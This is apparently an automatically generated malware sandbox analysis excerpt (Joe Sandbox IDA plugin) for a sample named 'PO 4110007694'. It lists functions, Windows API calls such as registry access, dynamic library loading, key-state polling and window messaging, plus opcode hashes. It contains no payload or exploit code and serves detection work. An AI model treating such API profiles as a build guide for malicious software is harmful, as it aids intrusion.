                                                                    • Instruction ID: bc211b6a0748a718c7267531dec0bbae286b3f01fb9f9b03968064177a87ef9f
                                                                    • Opcode Fuzzy Hash: 7fedb044d3113df262f231ed60f07608639ef2cf42a80d9fca25c56654fcd849
                                                                    • Instruction Fuzzy Hash: 4321A475500B059BDB209F69DC04B9A77A8EF45720F208A1AFCB5D72D0D770A951C761
                                                                    Function 00C7AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00C7AC54
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C7ACA8
                                                                    • __swprintf.LIBCMT ref: 00C7ACC1
                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00C9F910), ref: 00C7ACFF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                    • String ID: %lu
                                                                    • API String ID: 3164766367-685833217
                                                                    • Opcode ID: 9376bcb3b07b9c7aa4d9a1f02952d158c08e18c0a703ee26dbf2e986ad18d641
                                                                    • Instruction ID: 0dd710abfd01a30efeac01f0d2be8e2e64b4252dc5ea9f0e922a6566da8e7cc0
                                                                    • Opcode Fuzzy Hash: 9376bcb3b07b9c7aa4d9a1f02952d158c08e18c0a703ee26dbf2e986ad18d641
                                                                    • Instruction Fuzzy Hash: 6D214131A00109EFCB10DF65C945EEE7BB8FF89714B1080A9F909DB251DA31EA45EB61
                                                                    Function 00C71AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00C71B19
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                    • API String ID: 3964851224-769500911
                                                                    • Opcode ID: 75f36a6964fcf885ed3d7c9970eb864c59aa23fa725b6165c4d57cedb905a66b
                                                                    • Instruction ID: 325e0c32185fd3cf62bd8b7c688d95cec32b3b5e9e564ff6dd13f8e4cbe3fccd
                                                                    • Opcode Fuzzy Hash: 75f36a6964fcf885ed3d7c9970eb864c59aa23fa725b6165c4d57cedb905a66b
                                                                    • Instruction Fuzzy Hash: F11165719102088FCF00DF54D8519FEB7B4FF65304F148469D81597691EB325D0AEB54
                                                                    Function 00C8EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C8EC07
                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C8EC37
                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C8ED6A
                                                                    • CloseHandle.KERNEL32(?), ref: 00C8EDEB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                    • String ID:
                                                                    • API String ID: 2364364464-0
                                                                    • Opcode ID: a51311f48bb952f8035c2321f50410c5a0744adcc47c0b4e47f5fb338753d7ae
                                                                    • Instruction ID: a1c40ffcc427b847dc3a32dd9845fcb5373988e337a79a15cc9ac30f828f964c
                                                                    • Opcode Fuzzy Hash: a51311f48bb952f8035c2321f50410c5a0744adcc47c0b4e47f5fb338753d7ae
                                                                    • Instruction Fuzzy Hash: B2819D716043009FE720EF28C896F6AB7E5EF49710F04881DF999DB2D2DAB0AD45DB85
                                                                    Function 00C3541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                    • String ID:
                                                                    • API String ID: 1559183368-0
                                                                    • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                    • Instruction ID: 1ef301eb67ddd39fa5b9b787140574da38843d496cc3e26b5d185cbaa7cf72de
                                                                    • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                    • Instruction Fuzzy Hash: F551C870A20B05DBDB289F69D88066E77B6AF40331F248729F835962D0D771EE909B41
                                                                    Function 00C90037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                      • Part of subcall function 00C90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C8FDAD,?,?), ref: 00C90E31
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C900FD
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C9013C
                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C90183
                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00C901AF
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C901BC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                    • String ID:
                                                                    • API String ID: 3440857362-0
                                                                    • Opcode ID: 4a484055b91508002cc05ecc28b0a94c0db053a25e44b85c5b30162199ba3234
                                                                    • Instruction ID: 8d9112ff371cb0e6d994e0816511e88f9033322b8ae70bdbc6f36c41da57b4e6
                                                                    • Opcode Fuzzy Hash: 4a484055b91508002cc05ecc28b0a94c0db053a25e44b85c5b30162199ba3234
                                                                    • Instruction Fuzzy Hash: 3C514C31208204AFDB14EF54C885FAEB7E9FF84314F50491DF555872A2DB31EA45EB52
                                                                    Function 00C8D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C8D927
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00C8D9AA
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C8D9C6
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00C8DA07
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C8DA21
                                                                      • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C77896,?,?,00000000), ref: 00C15A2C
                                                                      • Part of subcall function 00C15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C77896,?,?,00000000,?,?), ref: 00C15A50
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 327935632-0
                                                                    • Opcode ID: 8016933d111215ee38ac0f3b9a5877703bb01c59982aa86b47bbfe01b3ee1cc6
                                                                    • Instruction ID: 3d03bd2e70ec8f26604e02ebc1bd2587399b64cf3e8f0f74a481de30e0b33596
                                                                    • Opcode Fuzzy Hash: 8016933d111215ee38ac0f3b9a5877703bb01c59982aa86b47bbfe01b3ee1cc6
                                                                    • Instruction Fuzzy Hash: 51513935A04205DFCB04EFA8C4849EDB7B4FF49314B148069E856AB352DB31EE85EF91
                                                                    Function 00C7E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C7E61F
                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C7E648
                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C7E687
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C7E6AC
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C7E6B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 1389676194-0
                                                                    • Opcode ID: 8bd79d75679c4ad9e02aeb7a34bdf1787f3c2e43c2aa6c46fffd22d04cce9e84
                                                                    • Instruction ID: 4c091bc5549c90bf297f7b8192df18f869baa94a33808e4cb04544a150d19a0d
                                                                    • Opcode Fuzzy Hash: 8bd79d75679c4ad9e02aeb7a34bdf1787f3c2e43c2aa6c46fffd22d04cce9e84
                                                                    • Instruction Fuzzy Hash: 25510D35A00109DFDB01EF64C995AADBBF5EF09314F1480A9E859AB3A1CB31EE51EF50
                                                                    Function 00C9A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c043d2bd719ff39dfa3a74b4f2af5181e103e50def2d52ebe16331e1202caea8
                                                                    • Instruction ID: 50aaca754c58241f503f3c4f02b5b9fa0941a0e7161018cb34afb19a45a13cc7
                                                                    • Opcode Fuzzy Hash: c043d2bd719ff39dfa3a74b4f2af5181e103e50def2d52ebe16331e1202caea8
                                                                    • Instruction Fuzzy Hash: 22418035905214EFDB24DB68CC4DFADBBA4EB09310F150166F926A72E1C730AE51EA91
                                                                    Function 00C12344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 00C12357
                                                                    • ScreenToClient.USER32(00CD57B0,?), ref: 00C12374
                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00C12399
                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00C123A7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                    • String ID:
                                                                    • API String ID: 4210589936-0
                                                                    • Opcode ID: 81d01d7a8e1a0f1d587feb9f9cc0f2cd88a01f651fe11599ad9427270c86a13c
                                                                    • Instruction ID: cee532b595ddfde912f0e750f3d9ac5fe25c3bfc445b1fca94dcf81959df6b8c
                                                                    • Opcode Fuzzy Hash: 81d01d7a8e1a0f1d587feb9f9cc0f2cd88a01f651fe11599ad9427270c86a13c
                                                                    • Instruction Fuzzy Hash: EE415439504115FFDF199F69C888AEDBB74FB05360F50435AF839921A0C7349EA4EB91
                                                                    Function 00C663AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C663E7
                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00C66433
                                                                    • TranslateMessage.USER32(?), ref: 00C6645C
                                                                    • DispatchMessageW.USER32(?), ref: 00C66466
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C66475
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                    • String ID:
                                                                    • API String ID: 2108273632-0
                                                                    • Opcode ID: dc07324fc6edd798faae0b864639c5d8d6e87e3a4edeecef844f18b40dfb76c4
                                                                    • Instruction ID: 41f15b90e7fb93b72399366f221b2650febac687c063a8ac6b911c0cc7142374
                                                                    • Opcode Fuzzy Hash: dc07324fc6edd798faae0b864639c5d8d6e87e3a4edeecef844f18b40dfb76c4
                                                                    • Instruction Fuzzy Hash: 1B31A171941646AFDB34CFB1DC88BBABBE8AB01304F14017AE435C31A1EB359989DB60
                                                                    Function 00C68A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00C68A30
                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00C68ADA
                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00C68AE2
                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00C68AF0
                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00C68AF8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleep$RectWindow
                                                                    • String ID:
                                                                    • API String ID: 3382505437-0
                                                                    • Opcode ID: 21e3d80b0ed633579305c3803e4618abc39beff68ed22bd423a20fc71e1ec1f0
                                                                    • Instruction ID: 3376c8a3ca939b1530519511bbdf126e4562af1f96b84a4029297ccc54386183
                                                                    • Opcode Fuzzy Hash: 21e3d80b0ed633579305c3803e4618abc39beff68ed22bd423a20fc71e1ec1f0
                                                                    • Instruction Fuzzy Hash: 4531C071500219EFDF24CFA8DD8CB9E3BB5EB04315F10822AF925E61D1C7B09A58EB90
                                                                    Function 00C6B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 00C6B204
                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C6B221
                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C6B259
                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C6B27F
                                                                    • _wcsstr.LIBCMT ref: 00C6B289
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                    • String ID:
                                                                    • API String ID: 3902887630-0
                                                                    • Opcode ID: 3b208d2d087516a87e866082fa742eae88ba5a3240cb3874947deeaac57fe128
                                                                    • Instruction ID: 306ad8b03f01aaf23ce46b6e4e8c42a8c82e8ee468c7d566ef2078ce8f714fe5
                                                                    • Opcode Fuzzy Hash: 3b208d2d087516a87e866082fa742eae88ba5a3240cb3874947deeaac57fe128
                                                                    • Instruction Fuzzy Hash: 5721F5322042047BEB255B759C99F7F7BECDF49710F10413EF805DA161EB61DD81A260
                                                                    Function 00C9B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00C9B192
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00C9B1B7
                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C9B1CF
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00C9B1F8
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00C80E90,00000000), ref: 00C9B216
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$MetricsSystem
                                                                    • String ID:
                                                                    • API String ID: 2294984445-0
                                                                    • Opcode ID: 356123fd1252703752de67ea9f8c9cadab9efef80da18b3cbc21206550738d71
                                                                    • Instruction ID: 70a6c01478a465bad18f23899c35bd60c69d953ca5dc4532cb0527e7cf50cbe6
                                                                    • Opcode Fuzzy Hash: 356123fd1252703752de67ea9f8c9cadab9efef80da18b3cbc21206550738d71
                                                                    • Instruction Fuzzy Hash: 1E217C71A10655AFCF109F39AD4CB6E3BA4EB05721B11462AF932D71E0E7309E219B90
                                                                    Function 00C69307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C69320
                                                                      • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C69352
                                                                    • __itow.LIBCMT ref: 00C6936A
                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C69392
                                                                    • __itow.LIBCMT ref: 00C693A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$__itow$_memmove
                                                                    • String ID:
                                                                    • API String ID: 2983881199-0
                                                                    • Opcode ID: 3293a2964519d5eb2f3724237e607f26e93fc893fd5004116a4e7193d769f613
                                                                    • Instruction ID: 8ad0b47535fa49521f0b61547e2ad570b13c8f64c82118c48357fb53bb5bab05
                                                                    • Opcode Fuzzy Hash: 3293a2964519d5eb2f3724237e607f26e93fc893fd5004116a4e7193d769f613
                                                                    • Instruction Fuzzy Hash: 6121C531704208BBDB20AB658CC9EEE7BBDEB49710F044039F905DB2E1D6B08E56A791
                                                                    Function 00C85A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindow.USER32(00000000), ref: 00C85A6E
                                                                    • GetForegroundWindow.USER32 ref: 00C85A85
                                                                    • GetDC.USER32(00000000), ref: 00C85AC1
                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00C85ACD
                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00C85B08
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
